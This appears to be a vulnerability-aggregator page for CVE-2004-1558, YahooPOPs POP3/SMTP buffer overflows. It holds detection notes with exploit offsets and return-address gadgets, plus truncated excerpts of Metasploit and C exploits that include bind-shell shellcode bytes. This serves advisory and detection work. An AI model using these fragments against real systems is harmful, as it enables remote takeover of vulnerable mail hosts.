CVE-2004-1558
published 2004-12-31CVE-2004-1558: Multiple stack-based buffer overflows in YPOPs! (aka YahooPOPS) 0.4 through 0.6 allow remote attackers to cause a denial of service (crash) and possibly…
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
71.11%
99.3th percentile
Multiple stack-based buffer overflows in YPOPs! (aka YahooPOPS) 0.4 through 0.6 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) POP3 USER command or (2) SMTP request.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypopsemail | ypops_! | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploit attempts by monitoring for SMTP banner string 'YahooPOPs! Simple Mail Transfer Service Ready' followed by oversized payloads exceeding 503 bytes on the SMTP port. ↗
- →Alert on connections to TCP port 101 after an SMTP session to a YahooPOPs server, as the shellcode binds a shell on port 101 post-exploitation. ↗
- →Detect the JMP EBX opcode (\xff\xe3) appended after a large NOP sled and shellcode in SMTP traffic to YahooPOPs servers; the exploit constructs a payload of exactly 508 bytes minus shellcode size filled with \x90 NOPs. ↗
- →The Metasploit module uses a fixed offset of 503 bytes before the return address across all targets; monitor for SMTP payloads of ~503+ bytes sent to YahooPOPs SMTP service. ↗
- →The exploit leverages a JMP EBX gadget in ws2_32.dll; monitor for EIP control redirecting to ws2_32.dll address space on Windows hosts running YahooPOPs. ↗
- →For POP3 exploitation (CVE-2004-1558 related), monitor for requests exceeding 180 bytes on TCP port 110 to YahooPOPs, which can overwrite EAX and ECX. ↗
- ·The JMP ESP return address (\x23\x9b\x02\x10) is sourced from libcurl.dll bundled with YahooPOPs, making it version-specific and not requiring an offset update per the exploit author. ↗
- ·The SMTP overflow exploit cannot be directly adapted for POP3 (port 110) with a full bind/reverse shell due to insufficient buffer space; only a limited payload may fit on POP3. ↗
- ·The Metasploit module targets YPOPS 0.6 (and possibly 0.5, 0.4.5.1, 0.4.5) via the POP3 service, while the standalone exploits (577, 582) target SMTP on version 1.6; detection rules should account for both service vectors. ↗
- ·Bad characters for payload encoding are \x00 and \x25; payloads containing these bytes will not function correctly. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jf97-8p4h-gh74: The POP3 service in YahooPOPs (aka YPOPs!) 1
ghsa_unreviewed·2024-01-29·CVSS 7.5
CVE-2024-24736 [HIGH] CWE-120 GHSA-jf97-8p4h-gh74: The POP3 service in YahooPOPs (aka YPOPs!) 1
The POP3 service in YahooPOPs (aka YPOPs!) 1.6 allows a remote denial of service (reboot) via a long string to TCP port 110, a related issue to CVE-2004-1558.
GHSA
GHSA-vfwv-p32r-49c7: Multiple stack-based buffer overflows in YPOPs! (aka YahooPOPS) 0
ghsa_unreviewed·2022-04-29
CVE-2004-1558 [HIGH] GHSA-vfwv-p32r-49c7: Multiple stack-based buffer overflows in YPOPs! (aka YahooPOPS) 0
Multiple stack-based buffer overflows in YPOPs! (aka YahooPOPS) 0.4 through 0.6 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) POP3 USER command or (2) SMTP request.
No detection rules found.
Exploit-DB
YahooPOPs (YPOPS) 0.6 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-1558 YahooPOPs (YPOPS) 0.6 - Remote Buffer Overflow (Metasploit)
YahooPOPs (YPOPS) 0.6 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: ypops_overflow1.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'YPOPS 0.6 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the YPOPS POP3
service.
This is a classic stack buffer overflow for YPOPS version 0.6.
Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to
jmp ebx opcode in ws_32.dll
},
'Author' => [ 'acaro ' ],
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2004-15
Exploit-DB
YahooPOPs 1.6 - SMTP Remote Buffer Overflow
exploitdb·2004-10-18
CVE-2004-1558 YahooPOPs 1.6 - SMTP Remote Buffer Overflow
YahooPOPs 1.6 - SMTP Remote Buffer Overflow
---
//Diabolic Crab's exploit for YahooPOPs
#include
#include
#include
#include
#include
#include
char scode[] = //Bind shell on port 101, taken from the windows exploit by class101
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\
Exploit-DB
YahooPOPs 1.6 - SMTP Port Buffer Overflow
exploitdb·2004-10-15
CVE-2004-1558 YahooPOPs 1.6 - SMTP Port Buffer Overflow
YahooPOPs 1.6 - SMTP Port Buffer Overflow
---
/*
YahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1
Exploit code by class101 [at] DFind.kd-team.com
Bind a shellcode to the port 101.
Thanx to Behrang Fouladi([email protected]) for the bug discovery
Thanx to HDMoore and Metasploit.com for their kickass ASM work
Instead of to move like you Behrang EBX to ESP after overwritting EIP,
I found out that only jumping to EBX is needed because our crafted payload
starts at EBX.
The exploit is tested working on Win2K SP4 and WinXP SP1, and it should works
also on NT4 and 2003 as the shellcode is designed for.
The jmp esp is from libcurl.dll wich come with yahoopops, just to notice there is no need of an offset update,
this is already "universal".
This exploit can't overflow th
Metasploit
YPOPS 0.6 Buffer Overflow
metasploit
YPOPS 0.6 Buffer Overflow
YPOPS 0.6 Buffer Overflow
This module exploits a stack buffer overflow in the YPOPS POP3 service. This is a classic stack buffer overflow for YPOPS version 0.6. Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to jmp ebx opcode in ws_32.dll
No writeups or analysis indexed.
http://dbeusee.home.comcast.net/history.htmlhttp://marc.info/?l=bugtraq&m=109630699829536&w=2http://secunia.com/advisories/12660http://securitytracker.com/alerts/2004/Sep/1011426.htmlhttp://www.attrition.org/pipermail/vim/2006-October/001089.htmlhttp://www.hat-squad.com/en/000075.htmlhttp://www.osvdb.org/10366http://www.osvdb.org/10367http://www.securityfocus.com/bid/11256https://exchange.xforce.ibmcloud.com/vulnerabilities/17515https://exchange.xforce.ibmcloud.com/vulnerabilities/17518http://dbeusee.home.comcast.net/history.htmlhttp://marc.info/?l=bugtraq&m=109630699829536&w=2http://secunia.com/advisories/12660http://securitytracker.com/alerts/2004/Sep/1011426.htmlhttp://www.attrition.org/pipermail/vim/2006-October/001089.htmlhttp://www.hat-squad.com/en/000075.htmlhttp://www.osvdb.org/10366http://www.osvdb.org/10367http://www.securityfocus.com/bid/11256https://exchange.xforce.ibmcloud.com/vulnerabilities/17515https://exchange.xforce.ibmcloud.com/vulnerabilities/17518
2004-12-31
Published